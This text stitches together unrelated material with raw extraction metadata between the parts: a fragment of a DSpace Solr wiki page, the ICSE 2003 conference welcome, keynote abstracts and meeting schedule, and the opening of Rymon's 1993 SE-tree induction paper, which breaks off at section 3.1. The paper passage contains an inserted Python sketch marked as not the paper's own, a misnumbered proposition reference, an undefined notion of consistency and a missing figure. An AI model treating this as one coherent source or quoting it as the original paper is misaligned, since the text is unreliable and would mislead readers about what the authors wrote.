(I haven't tested it, though) Resources: • http://wiki.apache.org/solr/VelocityResponseWriter Guidepost Other pages on this wiki describing Solr and Discovery. • Discovery Official DSpace 3.x documentation • DSpace Discovery Discovery proposal & purpose, intro video, Discovery 1.8 changes & configuration • DSpace Discovery HowTo Discovery screenshots (before Discovery was included in DSpace), most content obsolete (pre-1.7.0) See also: • Solr Tutorial • ajax-solr, a JavaScript library for creating user interfaces to Solr. • /var/log/tomcat6/catalina.out
{"Source-Url": "https://wiki.lyrasis.org/download/temp/pdfexport-20210815-150821-1508-1891/DSPACE-Solr-150821-1508-1892.pdf?contentType=application/pdf", "len_cl100k_base": 5632, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 22201, "total-output-tokens": 6268, "length": "2e12", "weborganizer": {"__label__adult": 0.0002363920211791992, "__label__art_design": 0.00041747093200683594, "__label__crime_law": 0.00022685527801513672, "__label__education_jobs": 0.0010251998901367188, "__label__entertainment": 0.00017082691192626953, "__label__fashion_beauty": 0.00011157989501953124, "__label__finance_business": 0.0003285408020019531, "__label__food_dining": 0.0002028942108154297, "__label__games": 0.0008683204650878906, "__label__hardware": 0.0006937980651855469, "__label__health": 0.00015437602996826172, "__label__history": 0.0002644062042236328, "__label__home_hobbies": 0.00011724233627319336, "__label__industrial": 0.00017821788787841797, "__label__literature": 0.00027942657470703125, "__label__politics": 0.0001798868179321289, "__label__religion": 0.0003535747528076172, "__label__science_tech": 0.0124359130859375, "__label__social_life": 0.00022161006927490232, "__label__software": 0.282958984375, "__label__software_dev": 0.69775390625, "__label__sports_fitness": 0.00018334388732910156, "__label__transportation": 0.00016498565673828125, "__label__travel": 0.00027060508728027344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21428, 0.02011]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21428, 0.22974]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21428, 0.75173]], "google_gemma-3-12b-it_contains_pii": [[0, 2954, false], [2954, 5918, null], [5918, 8709, null], [8709, 11343, null], [11343, 11832, null], [11832, 14982, null], [14982, 16540, null], [16540, 19178, null], [19178, 21428, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2954, true], [2954, 5918, null], [5918, 8709, null], [8709, 11343, null], [11343, 11832, null], [11832, 14982, null], [14982, 16540, null], [16540, 19178, null], [19178, 21428, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21428, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21428, null]], "pdf_page_numbers": [[0, 2954, 1], [2954, 5918, 2], [5918, 8709, 3], [8709, 11343, 4], [11343, 11832, 5], [11832, 14982, 6], [14982, 16540, 7], [16540, 19178, 8], [19178, 21428, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21428, 0.05629]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
3c31ba2639cbfff385c68f5406c328bbdb06f329
Welcome to ICSE 2003, Software Engineering Week in Portland!

A MESSAGE FROM THE CHAIRS

Welcome to the silver anniversary of the International Conference on Software Engineering! Managing the complexity of modern software systems is without question a grand challenge for software engineering. It is therefore fitting that, inspired by the view of Mount Hood, the theme for this year's meeting is: Scaling New Heights. ICSE 2003 brings together world leaders in software engineering research, practice, and education to present and discuss the most recent advances, trends, and concerns in this ever expanding and critical field.

Software Engineering is a vibrant and growing discipline. This year there was a significant increase in submissions in all areas, with 324 technical papers, 52 education papers, and 61 experience reports submitted. All submissions were rigorously reviewed by multiple experts on the ICSE 2003 committees (a minimum of three reviewers for technical papers), leading to the acceptance of 42 technical papers, 16 experience reports, and 11 education papers. The result is an impressive program.

The ICSE Software Engineering Week, May 3 to 10, 2003, consists of the main ICSE conference and an interesting array of tutorials, workshops, and related events associated or co-located with ICSE. Each morning of the ICSE 2003 conference starts with a topical keynote address by an outstanding speaker. Other notable highlights of the program are: three mini-tutorials on new and promising software engineering technologies in the Frontiers of Software Practice (FoSP) track; a mini-tutorial on how to write a good research paper in software engineering; and participation from the automotive community in a session on automotive software engineering. Throughout the conference, there are also exhibits, posters, and research demonstrations, as well as a morning newsletter describing memorable moments from the previous day, humor, and fascinating facts. Finally, the conference features several breaks, lunches, and receptions providing opportunities to meet and mingle with old and new friends.

Prior to and immediately following the main ICSE 2003 program, there are 13 tutorials on a variety of topics and 14 workshops that offer a forum for interaction. There are also three special events: the Pioneers Symposium, the New Software Engineering Faculty Symposium, and the Doctoral Symposium. Finally, the week includes five co-located workshops and events: the Workshop on Software Configuration Management (SCM-11), the International SPIN Workshop on Model Checking of Software (SPIN 2003), the Workshop on Software Process Simulation Modeling (ProSim 2003), the International Workshop on Program Comprehension (IWPC 2003), and the Summit on Software Engineering Education.

ICSE 2003 is being held in the Portland Hilton Hotel, which resides in the heart of Portland's entertainment and cultural district, with access to performing arts, shopping, museums, coffee houses, microbreweries, and numerous restaurants, all within three blocks. We hope you seize the opportunity, perhaps before or after this busy Software Engineering week, to explore the "Rose City" and the many recreational opportunities of the Pacific Northwest.

A conference as diverse as ICSE requires the efforts of a number of volunteers. Thank you, members of the ICSE 2003 program committee, organizing committee, and all sub-committees! We also wish to acknowledge the support of our donors and sponsors.
Finally, thank you for joining us at this, the silver anniversary of ICSE. We anticipate that a memorable week of presentations, discussions, and demonstrations lies ahead. Enjoy!

http://www.icse-conferences.org/2003/

Lori A. Clarke, General Chair
Laura K. Dillon, Program Co-Chair
Walter Tichy, Program Co-Chair

### Table of Contents

- Conference Committees (inside front cover)
- Welcome Message (p. 1)
- Keynote Speakers (p. 3)
- Frontiers of Software Practice (FoSP) (p. 4)

#### Program

- ICSE Overall Program
- Community Meetings at ICSE
- Saturday May 3
- Sunday May 4
- Monday May 5
- Tuesday May 6
- Wednesday May 7
- Thursday May 8
- Friday May 9
- Saturday May 10
- Sunday May 11

#### ICSE Events, Workshops, Tutorials, Panels, Demos and Posters

- Doctoral Symposium (p. 17)
- New Software Engineering Faculty Symposium (NSEFS 03) (p. 17)
- Pioneers Symposium (p. 17)
- Agile Development: A Cooperative Learning Experience (p. 18)
- Workshops (p. 18)
- Tutorials (p. 23)
- Panels (p. 28)
- Demonstrations and Posters (p. 29)

#### Venue and Additional Information

- City of Portland, Reception, WOW! Newsletter, Student Volunteers (p. 32)
- ICSE 2004 and ICSE 2005 Announcements (inside back cover)
- Hotel Maps (back cover)
- Sponsors and Donors:
back cover #### Other Events Co-located with ICSE 2003 - **ProSim’03:** Workshop: Software Process Simulation Modeling (held off-site at Portland State University), May 3-4 - **SSEE II:** 2nd International Summit on Software Engineering Education, May 5 - **SPIN 2003:** The 10th International SPIN Workshop on Model Checking of Software, May 9-10 - **SCM-11:** 11th International Workshop on Software Configuration Management, May 9-10 - **IWPC 2003:** 11th International Workshop on Program Comprehension, May 10-11 The Grand Challenge of Trusted Components Bertrand Meyer, ETH, Zürich, and ISE Santa Barbara, USA Component-based development, one of the most promising paths of progress for the world of software engineering, is fraught with risks if it isn’t accompanied by a constant concern for quality. Components of demonstrably high quality may, on the other hand, bring a critical contribution to the improvement of both software products and the software process. This presentation will address the challenge of building “trusted components” whose quality can be guaranteed. It will discuss both the “low road” of certifying components built with current technologies and the “high road” of proving component properties. Bertrand Meyer is Professor of Software Engineering at the ETH (Swiss Federal Institute of Technology) and Scientific Advisor of ISE, the company he co-founded in 1985. He is the author of a number of books including “Object-Oriented Software Construction, 2nd edition,” “Eiffel: The Language” and “Reusable Software.” He has been involved in the design of numerous libraries and tools applying the principles of “Design by Contract” and object technology. Must There Be So Few? Including Women in CS Joanne McGrath Cohoon, Department of Leadership, Foundations and Policy, University of Virginia, USA Women’s participation in undergraduate computing is low and likely to continue declining. This situation is not due to intractable gender differences, however. It has been demonstrated that academic computing departments can effectively recruit and retain female students. Dr. Cohoon will describe the current state of affairs and discuss how and why departments can act to reverse this trend. Joanne McGrath Cohoon is a sociologist who studies higher education, gender, and technology. She earned her BA in Philosophy from Ramapo College of New Jersey; her MA in Student Personnel Administration from Teacher’s College, Columbia University; and her Ph.D. in Sociology from the University of Virginia in 2000. Dr. Cohoon has held professional positions in higher education as a researcher, administrator, and instructor at a women’s college, a survey research center, a center for public service, and a continuing education program. She is currently a Research Assistant Professor in the Curry School of Education at the University of Virginia. Her research has been funded by the Alfred P. Sloan Foundation and the National Science Foundation. She is a member of the ACM, SIGCSE, and sociological and higher education professional organizations. Relating Software Engineering and Information Security Eugene Spafford, Purdue University, USA There are many connections between software engineering (SE) and information security (infosec). Some are obvious, such as the process of detecting software faults, and some are more subtle, such as definition and capture of privacy requirements. 
In both infosec and SE there are complex challenges of how best to balance cost, design, technology, and time to market: Too often, good practices are skipped because of cost or time. Meanwhile, failures in both areas can lead to everything from minor inconvenience to catastrophic failures and compromises. In this talk, I intend to explain some of the connections I see between SE and infosec. In particular, I hope to illustrate how some of the challenges — and advances — in infosec have a basis in SE. Some of these suggest high-leverage areas of research, while others provide insight about why we will continue to experience security problems in widely deployed software. For instance, is there truth to the contention that open source software is more secure than proprietary source? Along the way, I will connect Las Vegas, the PDP-11, Roman chariots, and a common security flaw as one illustration of how unintended consequences shape both security and software development.

Eugene H. Spafford is a professor of Computer Sciences at Purdue University, a professor of Philosophy (courtesy appointment), and is Director of the Center for Education and Research in Information Assurance and Security (CERIAS). Spaf's research career has included work in information security, software engineering, distributed systems, and professional ethics. Dr. Spafford is a Fellow of the ACM, Fellow of the AAAS, Fellow of the IEEE, and is a charter recipient of the Computer Society's Golden Core award. He was the year 2000 recipient of the NIST/NCSC National Computer Systems Security Award, generally regarded as the field's most significant honor in information security research. In 2001, he was elected to the ISSA Hall of Fame, and he was awarded the William Hugh Murray medal of the NCISSE for his contributions to research and education in infosec. Among his many activities, Spaf is co-chair of the ACM's U.S. Public Policy Committee and of its Advisory Committee on Computer Security and Privacy, is a member of the Board of Directors of the Computing Research Association, and is a member of the US Air Force Scientific Advisory Board.

Frontiers of Software Practice (FoSP)

FoSP talks are mini-tutorials that provide an overview of a topic at the frontier of software practice.

Component Technology - What, Where, and How? Tuesday, May 6 Clemens Szyperski, Microsoft Corporation, USA

Software components, if used properly, offer many software engineering benefits. Yet, they also pose many challenges starting from quality assurance and ranging to architectural embedding and composability. In addition, the recent movement towards services as well as the established world of objects cause many to wonder what purpose components might have. This talk offers an end-to-end overview of what components should do, where they should be used, and how this can be achieved.

Clemens Szyperski is a Software Architect with Microsoft, which he joined in 1999, and affiliated with Microsoft Research, both in Redmond, WA. He is also an adjunct professor at Queensland University of Technology in Brisbane, Australia. He received his Ph.D. in computer science from the Swiss Federal Institute of Technology (ETH) in Zurich, Switzerland under Prof. Niklaus Wirth. Clemens is the award-winning author of "Component Software: Beyond Object-Oriented Programming," which is being released in its second edition.
He is also the co-author of "Software Ecosystem: An Indispensable Industry and Technology," to appear later this year. In addition, he has published several other books and many articles, and he frequently presents at international events. Clemens has worked as an academic, researcher, and practitioner in the areas of programming languages, component technologies, software systems, and software architecture. He is a co-founder of Oberon Microsystems in Zurich, specializing in component technology and software architecture. He has served as a consultant to large corporations and serves as an assessor and reviewer for domestic, federal, and international funding agencies and for learned journals across the globe. He has been a member of program and organizing committees of numerous events, including many of the most prestigious conferences in his discipline areas. Patterns, Frameworks, and Middleware: Their Synergistic Relationship Wednesday, May 7 Douglas Schmidt, Vanderbilt University, DARPA, USA Historically, the knowledge required to develop mission-critical software systems has largely existed in programming folklore, the heads of experienced researchers and developers, or buried deep within complex source code. Today’s methods and tools for software modeling help somewhat by capturing how a system is designed. They only automate limited portions of software development, however, and do not articulate why a system is designed in a particular way, which may complicate software evolution and optimization. Patterns, frameworks, and middleware are increasingly popular techniques for addressing the challenges outlined above. Patterns codify design expertise that provides time-proven solutions to commonly occurring software problems that arise in particular contexts. Frameworks provide (1) a reusable architecture-based on patterns-for a family of related applications and (2) an integrated set of collaborating components that implement concrete realizations of the architecture. Middleware is a class of software that leverages patterns and frameworks to increase systematic reuse significantly by bridging the gap between the end-to-end functional requirements of applications and the underlying operating systems and network protocol stacks. The relationship between patterns, frameworks, and middleware is highly synergistic. For example, patterns help guide framework creation and use, thereby reducing development effort and training costs. In turn, frameworks can be used to develop middleware, whose interfaces then provide a simpler facade for the complex internal component structure of the frameworks. This talk describes the synergy between patterns, frameworks, and middleware and illustrates how they have been applied successfully in many production mission-critical software systems. Dr. Schmidt is a Professor in the Electrical Engineering and Computer Science Department at Vanderbilt University. His research focuses on patterns, optimization techniques, and empirical analyses of object-oriented frameworks that facilitate the development of high-performance, real-time distributed object computing middleware on parallel platforms running over high-speed networks and embedded system interconnects. In addition to his academic research, Dr. Schmidt has over fifteen years of experience developing object-oriented middleware, in particular ACE and TAO, which are widely-used frameworks that implement patterns for high-performance, real-time systems. Dr. 
Schmidt also serves as a program manager in the DARPA Information Exploitation Office (IXO), where he leads the effort on distributed object computing middleware research. CyberSecurity: What are Best Practices? Richard Kemmerer, University of California at Santa Barbara, USA As more business activities are being automated and an increasing number of computers are being used to store vital and sensitive information, the need for secure computer systems becomes apparent. This need is even more apparent as systems and applications are being distributed and access is via an insecure network. Secure systems and networks can be obtained only through systematic development; they cannot be achieved through haphazard seat-of-the-pants methods. The pervasive use of computer and network technologies in all walks of life has turned cybersecurity issues into national security issues. The Internet has become critical for governments, companies, financial institutions, and millions of everyday users. Networks of computers support a multitude of activities whose loss would all but cripple these organizations. Protecting these critical infrastructures is a difficult task. This talk introduces some known threats to cybersecurity, categorizes the threats, and analyzes protection mechanisms and techniques for countering the threats. Approaches to prevent, detect, and respond to cyber attacks will also be discussed. Richard A. Kemmerer is a Professor and past Chair of the Department of Computer Science at the University of California, Santa Barbara. He is a Fellow of the IEEE Computer Society and of the ACM, and past Editor-in-Chief of IEEE Transactions on Software Engineering. Dr. Kemmerer was the program co-chair of the 20th International Conference on Software Engineering (ICSE’98). He has served as a member of the National Academy of Science’s Committee on Computer Security in the DOE, the System Security Study Committee, the Committee for Review of the Oversight Mechanisms for Space Shuttle Flight Software Processes, the Committee on Maintaining Privacy and Security in Health Care Applications of the National Information Infrastructure, and the Committee on the Review of Programs for Command, Control, Communication, Computers, and Intelligence (C4I) in the Department of Defense. He has also served as a member of the National Computer Security Center’s Formal Verification Working Group and was a member of the NIST’s Computer and Telecommunications Security Council. Dr. Kemmerer is also the past Chair of the IEEE Technical Committee on Security and Privacy and a past member of the Advisory Board for the ACM’s Special Interest Group on Security, Audit, and Control. He has written numerous papers on the subjects of computer security, formal specification and verification, software testing, programming languages, and software complexity measures. He is the author of the book “Formal Specification and Verification of an Operating System Security Kernel” and a co-author of “Computers at Risk: Safe Computing in the Information Age.” He has been a Principal Investigator on numerous government and private sector sponsored projects and leads the Reliable Software Group at UCSB. Under his direction the Reliable Software Group has addressed the need for better languages and tools for designing, building, validating, and securing software systems. ICSE 2003 Overall Program At-A-Glance <table> <thead> <tr> <th>Sat. May 3</th> <th>Sun. May 4</th> <th>Mon. May 5</th> <th>Tue. May 6</th> <th>Wed. May 7</th> <th>Thu. 
May 8</th> <th>Fri. May 9</th> <th>Sat. May 10</th> </tr> </thead> <tbody> <tr> <td>Workshops W1-W4</td> <td>Doctoral Symp.</td> <td>Technical Program</td> <td>Workshop W10</td> <td>Workshops W6-W9</td> <td>Pioneers Symp.</td> <td>New Faculty Symp.</td> <td>Workshops W11-W15</td> </tr> <tr> <td>Workshops W6-W9</td> <td>Tutorials F3-F6</td> <td>Tutorials F7-F8, F10-F11, H1-H6</td> <td>Computing Curricula for SE (CCSE)</td> <td>Demos</td> <td>Awards</td> <td>Closing Ceremonies</td> <td>SPIN</td> </tr> </tbody> </table> Community Meetings at ICSE <table> <thead> <tr> <th>Date</th> <th>Time</th> <th>Meeting</th> <th>Location</th> </tr> </thead> <tbody> <tr> <td>Sunday May 4</td> <td>8am - 6pm</td> <td>ESEC/FSE PC Meeting</td> <td>Grand Ballroom II</td> </tr> <tr> <td>Monday May 5</td> <td>8am - 6pm</td> <td>ESEC/FSE PC Meeting</td> <td>Grand Ballroom II</td> </tr> <tr> <td>Monday May 5</td> <td>6 - 7pm</td> <td>ICSE ’04 PC Meeting</td> <td>Parlor A&amp;B</td> </tr> <tr> <td>Monday May 5</td> <td>7:30 - 10:30pm</td> <td>ICSE steering committee meeting</td> <td>Alexander’s</td> </tr> <tr> <td>Tuesday May 6</td> <td>12 -1:30pm</td> <td>SIGSOFT Executive Committee Meeting</td> <td>Senate</td> </tr> <tr> <td>Tuesday May 6</td> <td>5 - 6pm</td> <td>SIGSOFT General Meeting</td> <td>Broadway II-IV</td> </tr> <tr> <td>Tuesday May 6</td> <td>6 - 7pm</td> <td>TCSE General Meeting</td> <td>Broadway II-IV</td> </tr> <tr> <td>Tuesday May 6</td> <td>6 - 10pm</td> <td>IFSA</td> <td>Forum</td> </tr> <tr> <td>Wednesday May 7</td> <td>12 - 1:30pm</td> <td>ICM Steering Committee Meeting</td> <td>Senate</td> </tr> <tr> <td>Wednesday May 7</td> <td>12 - 1:30pm</td> <td>ESEC/FSE Steering Committee Meeting</td> <td>Studio</td> </tr> <tr> <td>Wednesday May 7</td> <td>6 - 7pm</td> <td>ISSTA Steering Committee Meeting</td> <td>Studio</td> </tr> <tr> <td>Wednesday May 7</td> <td>7 - 9pm</td> <td>TSE board meeting and dinner</td> <td>Alexander’s Crown Room</td> </tr> <tr> <td>Friday May 9</td> <td>8:30-11am</td> <td>ICSE postmortem</td> <td>Alexander’s</td> </tr> </tbody> </table>
{"Source-Url": "http://www.icse-conferences.org/2003/Posters/p2.pdf", "len_cl100k_base": 4862, "olmocr-version": "0.1.49", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 15874, "total-output-tokens": 4913, "length": "2e12", "weborganizer": {"__label__adult": 0.0003800392150878906, "__label__art_design": 0.00044655799865722656, "__label__crime_law": 0.0003767013549804687, "__label__education_jobs": 0.00952911376953125, "__label__entertainment": 9.489059448242188e-05, "__label__fashion_beauty": 0.00017368793487548828, "__label__finance_business": 0.0002493858337402344, "__label__food_dining": 0.0004453659057617187, "__label__games": 0.0007085800170898438, "__label__hardware": 0.0006184577941894531, "__label__health": 0.0005869865417480469, "__label__history": 0.00033164024353027344, "__label__home_hobbies": 0.0001004338264465332, "__label__industrial": 0.0003070831298828125, "__label__literature": 0.0003421306610107422, "__label__politics": 0.00028252601623535156, "__label__religion": 0.0005340576171875, "__label__science_tech": 0.01511383056640625, "__label__social_life": 0.00023186206817626953, "__label__software": 0.0090789794921875, "__label__software_dev": 0.958984375, "__label__sports_fitness": 0.0004031658172607422, "__label__transportation": 0.00041365623474121094, "__label__travel": 0.0003643035888671875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 22435, 0.01659]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 22435, 0.04194]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 22435, 0.9121]], "google_gemma-3-12b-it_contains_pii": [[0, 3821, false], [3821, 7471, null], [7471, 11392, null], [11392, 15955, null], [15955, 20754, null], [20754, 22435, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3821, true], [3821, 7471, null], [7471, 11392, null], [11392, 15955, null], [15955, 20754, null], [20754, 22435, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 22435, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 22435, null]], "pdf_page_numbers": [[0, 3821, 1], [3821, 7471, 2], [7471, 11392, 3], [11392, 15955, 4], [15955, 20754, 5], [20754, 22435, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 22435, 0.16495]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
75769165078de4b17aee0f65e440debfa770aa18
An SE-tree based Characterization of the Induction Problem
MS-CIS-93-42 LINC LAB 248
Ron Rymon
University of Pennsylvania, School of Engineering and Applied Science, Computer and Information Science Department, Philadelphia, PA 19104-6389
April 1993

An SE-tree based Characterization of the Induction Problem

Ron Rymon
Computer and Information Science, University of Pennsylvania, Philadelphia, PA 19104
rymon@linc.cis.upenn.edu
(Proceedings Machine Learning Conference, Amherst MA, 1993)

Abstract

Many induction programs use decision trees both as the basis for their search, and as a representation of their classifier solution. In this paper we propose a new structure, called SE-tree, as a more general alternative.

1 INTRODUCTION

Many learning algorithms use decision trees as an underlying framework for search and as a representation of their classifier solutions (e.g. ID3 [Quinlan, 86], CART [Breiman et al., 84]). This framework, however, is known to mix search bias (introduced when the algorithm decides on the order in which attributes are to be used in splitting) with hypotheses-space bias. To avoid being trapped by this bias, several researchers have suggested averaging over multiple trees (e.g. [Buntine, 91]).

In this paper, still within a recursive partitioning framework, we propose using an alternative data structure called SE-tree [Rymon, 92]. On one hand, since the new framework shares many of the features of decision tree-based algorithms, we should be able to adopt many sub-techniques developed for the latter. On the other hand, an SE-tree embeds a large number of decision trees, thereby providing a more expressive, more flexible, representation for classifiers. Importantly, SE-tree-based algorithms can eliminate almost completely the search bias, admitting instead a user-specified hypotheses-space preference criterion.

Section 2 outlines a formal theory of induction where classifiers take the form of collections of rules. Sections 3 and 4 present the SE-tree, and render it useful in searching and representing such collections (the learning phase), and in subsequently using them for classification. Incorporation of user-specified bias in either stage, or in both, is described in Sections 4 and 5. Section 6 presents general results relating the SE-tree to decision trees, with some algorithmic implications.

2 A THEORY FOR INDUCTION

Formalizing the induction problem, we will examine collections of production rules that best model the function (concept) represented by the training data. Rules provide a common denominator for decision trees on one hand, and SE-trees on the other, since there is an obvious one-to-one mapping between rules and leaves of such trees.
Let us introduce a few useful definitions first. Let $\text{ATTRS}$ be a set of attributes (also called features or variables), where each attribute $A_i$ can take values from a finite unordered discrete domain denoted $\text{Dom}(A_i)$. A partial description is a subset of $\text{ATTRS}$, each attribute instantiated from its own domain. An object is a complete instantiation, i.e. one in which all attributes are instantiated. By $\text{UNIVERSE}$ we refer to the collection of all objects. Consider, for example, a space of 3 binary attributes $(A,B,C)$, hereafter called 3BIN. In 3BIN, $\{A=0,C=1\}$ is a partial description. $\{A=0,B=0,C=1\}$ is an object. $\text{UNIVERSE}$ is 3BIN itself; it is made of a total of 8 objects. A training set $\text{TSET}$, consisting of objects labeled by their correct class $\pi$, makes an induction problem instance.

Example 2.1 (The Checkers Problem) Consider a universe defined by two 3-valued attributes $(A,B)$, and a set of four classes $(\alpha,\beta,\gamma,\delta)$. The following figure depicts the training data and an illustration of $\text{UNIVERSE}$.

Having defined a problem instance, we shall try to characterize a solution. Conceptually, we assume the existence of a function $\text{target}$ from $\text{UNIVERSE}$ to the set of classes, and that the training data agree with this function. Our goal is to approximate $\text{target}$ over the complete universe, using conjunctive rules as our elementary building blocks.

A rule, $R$, is simply a partial description such that all objects in TSET that agree with it are equally classified, i.e. for every $t, t' \in \text{TSET}$, if $R \subseteq t, t'$ then $\pi(t) = \pi(t')$. To avoid irrelevant rules, we add the additional requirement that at least one object matched by the rule appears in TSET. As a partial description, a rule defines an equivalence class within the universe, namely $[R] \equiv \{t \in \text{UNIVERSE} \mid R \subseteq t\}$. Moreover, since all objects in $\text{TSET} \cap [R]$ agree on their class, we can define $\pi([R])$ to be that class, and write a production rule of the form $R \Rightarrow \pi([R])$. Thus, from here on, we shall interchangeably talk about a rule as a set of instantiated attributes, as a region in UNIVERSE, and as a conjunction of antecedents.

To model a target function, we use collections of rules, interpreted disjunctively for each class. In general, there may be many such collections. The Checkers problem, for instance, admits 8 rules and thus $2^8$ collections. The purpose of an inductive theory is to characterize desirable features of candidate collections. Bias, or preference, expresses the relative desirability of one collection versus another. Our theory has a single bias: for the most part, we will prefer rules that are syntactically simpler. By kernel rules we refer to rules that are most-general (minimal set-wise). Other bias, necessary to distinguish equally simple hypotheses, is deliberately left out of the theory. Our algorithms will modularly implement a user-specified preference criterion.

Consider the Checkers problem again. Only four of the eight rules are also kernel rules: (1) $(A=1) \Rightarrow \alpha$, (2) $(B=1) \Rightarrow \beta$, (3) $(B=3) \Rightarrow \gamma$, and (4) $(A=3) \Rightarrow \delta$. All other rules, e.g. $(A=1) \land (B=2) \Rightarrow \alpha$, are subsumed by one or more of the kernel rules.
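To make the definitions above concrete, here is a small illustrative sketch (ours, not the paper's). It encodes a training set consistent with the Checkers example (the exact training objects are our assumption, chosen so that the four kernel rules listed above come out), tests whether a partial description is a rule, and tests whether it is a kernel rule, i.e. a rule none of whose proper subsets is itself a rule.

```python
"""Illustrative sketch: rules and kernel rules for a Checkers-like training set.
A partial description is a dict {attribute: value}."""
from itertools import combinations

# Training set: (object, class). Chosen so that the kernel rules are
# (A=1)=>alpha, (B=1)=>beta, (B=3)=>gamma, (A=3)=>delta.
TSET = [
    ({"A": 1, "B": 2}, "alpha"),
    ({"A": 2, "B": 1}, "beta"),
    ({"A": 2, "B": 3}, "gamma"),
    ({"A": 3, "B": 2}, "delta"),
]

def matches(pd, obj):
    """A partial description matches an object if they agree on all of pd's attributes."""
    return all(obj.get(a) == v for a, v in pd.items())

def is_rule(pd):
    """pd is a rule if it matches at least one training object and all
    matched training objects carry the same class."""
    classes = {c for obj, c in TSET if matches(pd, obj)}
    return len(classes) == 1

def is_kernel_rule(pd):
    """A kernel rule is a rule none of whose proper subsets is a rule."""
    if not is_rule(pd):
        return False
    items = list(pd.items())
    for k in range(len(items)):
        for subset in combinations(items, k):
            if is_rule(dict(subset)):
                return False
    return True

print(is_rule({"A": 1}))                  # True  -> (A=1) => alpha
print(is_kernel_rule({"A": 1}))           # True
print(is_kernel_rule({"A": 1, "B": 2}))   # False: subsumed by (A=1)
print(is_rule({"B": 2}))                  # False: matches an alpha and a delta object
```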
Let $C$ be a collection of rules for a problem instance $P$; we use Kernel($C$) to denote the collection of kernel rules for $P$ that subsume rules in $C$. The collection of all kernel rules, denoted KRULES, is the target of our induction algorithms. Doing so, we avoid overfitting of the training data. We propose that over-generalization be dealt with in the classification phase via resolution methods based on the user's preference criterion. Intuitively, while learning, we adopt most-general principles. Rules that are too general will be in conflict with others, and will then be resolved.

**Definition 2.2 Completeness** A collection of rules $C$ is said to be complete w.r.t. $T \subseteq \text{UNIVERSE}$ if for every $t \in T$, there exists a rule $R \in C$ such that $R \subseteq t$.

**Proposition 2.3**

1. Let $C$ be a collection of rules that is complete w.r.t. some $T \subseteq \text{UNIVERSE}$; then Kernel($C$) is also complete w.r.t. $T$;
2. KRULES is complete w.r.t. TSET, but is not necessarily complete w.r.t. UNIVERSE.

Thus, in the Checkers problem, each of the "corner" objects is covered by two contradicting kernel rules (e.g. $\{A=1, B=1\}$ is covered by $(A=1) \Rightarrow \alpha$ and $(B=1) \Rightarrow \beta$). As per Proposition 2.5(2), KRULES may have (possibly several) sub-collections; the latter may have lesser coverage than KRULES. In contrast, any decision tree is consistent w.r.t. UNIVERSE.

But is consistency desirable at all? KRULES is inconsistent when two rules are over-general to the point where they contradict one another on as yet unseen parts of UNIVERSE. While ideally one or both rules need to be specialized or removed, the training data alone does not provide us with any suitable preference criterion. An external preference criterion, or bias [Mitchell, 80], must be applied. Bias can be defined as the set of all factors that collectively influence hypothesis selection [Utgoff, 86]. [Buntine, 90] divides such criteria into three separate classes: hypothesis-space bias comprises those criteria which specify a preference for one classifier over another; search bias consists of criteria used to guide the actual search for such; and finally, bias may have an application-specific component.

Adopting Buntine's dichotomy, we believe that an ideal learning system must eliminate search bias. Put differently, bias should be stated by the user, independently of the particular algorithm used. We believe SE-trees represent a step in that direction. So far, we have introduced a single bias, a preference for kernel rules. Next, when presenting the SE-Learn family of learning algorithms, we defer the introduction of bias to the latest point possible. A variety of user-defined preference criteria can be plugged into the learning and/or classification algorithms.

3 A LEARNING ALGORITHM

3.1 SET ENUMERATION TREES

